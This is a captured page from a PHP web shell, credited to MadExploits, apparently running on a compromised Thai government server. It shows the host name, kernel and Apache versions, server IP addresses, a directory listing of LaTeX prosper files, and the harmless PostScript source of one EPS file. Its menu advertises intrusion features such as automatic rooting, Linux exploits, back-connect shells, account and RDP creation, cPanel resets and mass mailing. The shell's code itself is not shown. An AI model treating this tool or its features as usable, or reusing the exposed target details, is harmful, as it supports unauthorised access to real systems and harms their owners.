Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
texmf /
tex /
latex /
prosper /
[ HOME SHELL ]
Name
Size
Permission
Action
PPRalcatel.sty
3.05
KB
-rw-r--r--
PPRalienglow.sty
2.14
KB
-rw-r--r--
PPRautumn.sty
3
KB
-rw-r--r--
PPRazure.sty
2.47
KB
-rw-r--r--
PPRblends.sty
3.54
KB
-rw-r--r--
PPRcapsules.sty
3.4
KB
-rw-r--r--
PPRcontemporain.sty
2.45
KB
-rw-r--r--
PPRcorners.sty
6.46
KB
-rw-r--r--
PPRdarkblue.sty
3.04
KB
-rw-r--r--
PPRdefault.sty
2.32
KB
-rw-r--r--
PPRframes.sty
2.7
KB
-rw-r--r--
PPRfyma.sty
4.19
KB
-rw-r--r--
PPRgyom.sty
3.43
KB
-rw-r--r--
PPRlignesbleues.sty
2.53
KB
-rw-r--r--
PPRmancini.sty
3.64
KB
-rw-r--r--
PPRnuancegris.sty
3.75
KB
-rw-r--r--
PPRprettybox.sty
3.57
KB
-rw-r--r--
PPRrico.sty
3.28
KB
-rw-r--r--
PPRserpaggi.sty
3.92
KB
-rw-r--r--
PPRthomasd.sty
5.03
KB
-rw-r--r--
PPRtroispoints.sty
2.57
KB
-rw-r--r--
PPRwhitecross.sty
4.04
KB
-rw-r--r--
PPRwinter.sty
5.48
KB
-rw-r--r--
PPRwj.sty
2.82
KB
-rw-r--r--
angleHG.ps
23.71
KB
-rw-r--r--
arrow-glow.ps
5.73
KB
-rw-r--r--
barre-rico.ps
11.68
KB
-rw-r--r--
blue-inverted-arrow.ps
28.48
KB
-rw-r--r--
boule-base.eps
3.24
KB
-rw-r--r--
boulebleue-fondblanc.eps
3.21
KB
-rw-r--r--
boulerouge-fondblanc.eps
3.21
KB
-rw-r--r--
bouleverte-fondblanc.eps
3.21
KB
-rw-r--r--
bullet-glow.ps
6.5
KB
-rw-r--r--
compilation.eps
8.05
KB
-rw-r--r--
degrade-base.eps
1.84
KB
-rw-r--r--
degrade-blanc-bleu.eps
1.84
KB
-rw-r--r--
green-bullet-on-blue-wc.ps
5.6
KB
-rw-r--r--
green-bullet-on-blue.ps
9.91
KB
-rw-r--r--
green-bullet-on-white.ps
8.74
KB
-rw-r--r--
green-inverted-arrow.ps
28.29
KB
-rw-r--r--
gyom.ps
74.43
KB
-rw-r--r--
prosper-structure.eps
7.64
KB
-rw-r--r--
prosper.cls
22.77
KB
-rw-r--r--
red-bullet-on-blue-wc.ps
5.44
KB
-rw-r--r--
red-bullet-on-blue.ps
9.97
KB
-rw-r--r--
red-bullet-on-white.ps
8.78
KB
-rw-r--r--
red-inverted-arrow.ps
28.29
KB
-rw-r--r--
rico.ps
195.62
KB
-rw-r--r--
rico_bullet1.ps
23.72
KB
-rw-r--r--
rico_bullet2.ps
23.72
KB
-rw-r--r--
rico_bullet3.ps
23.72
KB
-rw-r--r--
rotation.ps
12.82
KB
-rw-r--r--
rule-glow.ps
7.39
KB
-rw-r--r--
yellow-bullet-on-blue-wc.ps
6.12
KB
-rw-r--r--
yellow-bullet-on-blue.ps
10.35
KB
-rw-r--r--
yellow-bullet-on-white.ps
8.53
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : degrade-base.eps
%!PS-Adobe-2.0 EPSF-2.0 %%Creator: Fait main par Jean-Yves Burlett <jean-yves@burlett.org> %%BoundingBox: 80 80 100 100 %%Pages: 1 %%EndComments %%EndProlog %%Page: 1 1 /origstate save def 42 dict begin %% -------------------------------------------------- %% C O N F I G /endcol { 1 1 1 } def /startcol { .7 .7 1 } def /startwidth 20 def /endwidth 5 def /hauteur 20 def /nbpas 60 def %% -------------------------------------------------- % gsave % 1 0 0 setrgbcolor % newpath % 80 80 moveto % 100 80 lineto % 100 100 lineto % 80 100 lineto % 80 80 lineto % stroke % grestore 100 100 translate 180 rotate %%%%%% Fonctions qui servent /dup2 { dup 3 2 roll dup 4 1 roll exch } def % params i0 if maxiter numiter /onedstep { 1 sub exch 1 sub 4 2 roll exch dup 3 1 roll sub % ni-1 mi-1 i0 iD 4 -1 roll mul 3 -1 roll % i0 ni-1*iD mi-1 dup 0 eq { pop pop 0 } { div } ifelse add % I } def % params x0 y0 xf yf maxiter numiter /twodstep { dup2 8 5 roll exch 8 -3 roll % mi ni x0 xf y0 yf mi ni onedstep 5 1 roll 4 2 roll % Y x0 xf mi ni onedstep exch } def % params r0 g0 b0 rf gf bf maxiter numiter /threedstep { dup2 10 2 roll 5 -1 roll 10 1 roll twodstep % rf mi ni r0 C2 C3 6 2 roll 4 1 roll onedstep 3 1 roll % C1 C2 C3 } def % params x0 y0 w h col^3 /rectplein { gsave newpath setrgbcolor 4 2 roll moveto dup2 dup2 dup2 pop 0 rlineto 0 exch rlineto pop pop neg 0 rlineto neg 0 exch rlineto pop fill grestore } def %% Feu ! 1 1 nbpas { gsave newpath dup startcol endcol nbpas 8 -1 roll threedstep setrgbcolor startwidth endwidth nbpas 4 -1 roll onedstep 0 0 3 2 roll hauteur rectfill grestore } for end origstate restore %%Trailer
Close